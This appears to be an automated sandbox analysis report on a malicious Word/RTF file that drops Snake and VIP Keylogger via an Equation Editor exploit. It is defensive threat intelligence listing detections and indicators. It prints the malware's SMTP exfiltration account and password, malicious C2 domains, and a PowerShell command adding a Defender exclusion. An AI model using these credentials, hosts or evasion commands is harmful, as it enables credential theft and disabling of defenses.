Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Slip.doc

Overview

General Information

Sample name:Payment Slip.doc
Analysis ID:1519173
MD5:56fd8f0ced26a25748989b34f051f04c
SHA1:d163c3303db9ee003173fcd1082bf9381282baf8
SHA256:419e260eafabf9698076436238fca33bb4c44bc1aaa02f2187d37a121ca57c80
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3268 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3360 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • vvndewepeter91026.exe (PID: 3524 cmdline: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
        • powershell.exe (PID: 3576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • vvndewepeter91026.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
    • EQNEDT32.EXE (PID: 3852 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment Slip.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc641:$obj2: \objdata
  • 0xc65b:$obj3: \objupdate
  • 0xc619:$obj5: \objautlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.vvndewepeter91026.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            8.2.vvndewepeter91026.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              8.2.vvndewepeter91026.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                8.2.vvndewepeter91026.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.vvndewepeter91026.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3360, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3360, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3360, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ParentImage: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, ParentProcessId: 3524, ParentProcessName: vvndewepeter91026.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ProcessId: 3576, ProcessName: powershell.exe
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, NewProcessName: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3360, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ProcessId: 3524, ProcessName: vvndewepeter91026.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, NewProcessName: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3360, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ProcessId: 3524, ProcessName: vvndewepeter91026.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ParentImage: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, ParentProcessId: 3524, ParentProcessName: vvndewepeter91026.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ProcessId: 3576, ProcessName: powershell.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3360, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ParentImage: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe, ParentProcessId: 3524, ParentProcessName: vvndewepeter91026.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe", ProcessId: 3576, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3576, TargetFilename: C:\Users\user\AppData\Local\Temp\lvfoxrzz.mwb.ps1

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T07:47:20.416254+020020220501A Network Trojan was detected66.63.187.12380192.168.2.2249161TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T07:47:20.634853+020020220511A Network Trojan was detected66.63.187.12380192.168.2.2249161TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T07:47:31.314304+020028033053Unknown Traffic192.168.2.2249164188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T07:47:28.134204+020028032742Potentially Bad Traffic192.168.2.2249162132.226.8.16980TCP
                  2024-09-26T07:47:30.823828+020028032742Potentially Bad Traffic192.168.2.2249162132.226.8.16980TCP
                  2024-09-26T07:47:32.212268+020028032742Potentially Bad Traffic192.168.2.2249165193.122.6.16880TCP
                  2024-09-26T07:47:33.522644+020028032742Potentially Bad Traffic192.168.2.2249167158.101.44.24280TCP
                  2024-09-26T07:47:36.928631+020028032742Potentially Bad Traffic192.168.2.2249169193.122.130.080TCP
                  2024-09-26T07:47:38.265128+020028032742Potentially Bad Traffic192.168.2.2249169193.122.130.080TCP
                  2024-09-26T07:47:39.606636+020028032742Potentially Bad Traffic192.168.2.2249171132.226.247.7380TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Payment Slip.docAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeAvira: detection malicious, Label: HEUR/AGEN.1308792
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exeAvira: detection malicious, Label: HEUR/AGEN.1308792
                  Found malware configuration
                  Source: 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: Payment Slip.docReversingLabs: Detection: 44%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LLnsOpxxAnmWi[1].exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.123 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 002392F9h8_2_0023903A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 002373EDh8_2_00237200
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00237D77h8_2_00237200
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 002398BBh8_2_002394A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_00236728
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_00236D5A
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_00236F39
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 002398BBh8_2_002397EA
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00606349h8_2_00606078
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00608A42h8_2_00608748
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00602339h8_2_00602068
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00609D62h8_2_00609A68
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060F372h8_2_0060F078
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00600311h8_2_00600040
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00607111h8_2_00606E40
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00604321h8_2_00604050
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060B54Ah8_2_0060B250
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060E51Ah8_2_0060E220
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00603101h8_2_00602E30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060CD32h8_2_0060CA38
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006010D9h8_2_00600E08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00607ED9h8_2_00607C08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060FD02h8_2_0060FA08
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00608F0Ah8_2_00608C10
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006050E9h8_2_00604E18
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006047B9h8_2_006044E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060E9E2h8_2_0060E6E8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060ABBAh8_2_0060A8C0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00603599h8_2_006032C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006007A9h8_2_006004D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006075A9h8_2_006072D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006093D2h8_2_006090D8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00601571h8_2_006012A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00608412h8_2_006080A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060C3A2h8_2_0060C0A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00605581h8_2_006052B0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060DB8Ah8_2_0060D890
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00603A31h8_2_00603760
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00600C41h8_2_00600970
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00607A41h8_2_00607770
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060C86Ah8_2_0060C570
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060F83Ah8_2_0060F540
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00605A19h8_2_00605748
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060E052h8_2_0060DD58
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060A22Ah8_2_00609F30
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00601A09h8_2_00601738
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006027D1h8_2_00602500
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060D1FAh8_2_0060CF00
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 006067E1h8_2_00606510
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060BA12h8_2_0060B718
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00605EB1h8_2_00605BE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060BEDAh8_2_0060BBE0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00603EA1h8_2_00603BF8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060A6F2h8_2_0060A3F8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060D6C2h8_2_0060D3C8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00601EA1h8_2_00601BD0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060989Ah8_2_006095A0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00606C7Ah8_2_006069A8
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060EEAAh8_2_0060EBB0
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00604C51h8_2_00604980
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 0060B082h8_2_0060AD88
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00602C69h8_2_00602998
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 4x nop then jmp 00C1165Ah8_2_00C11360
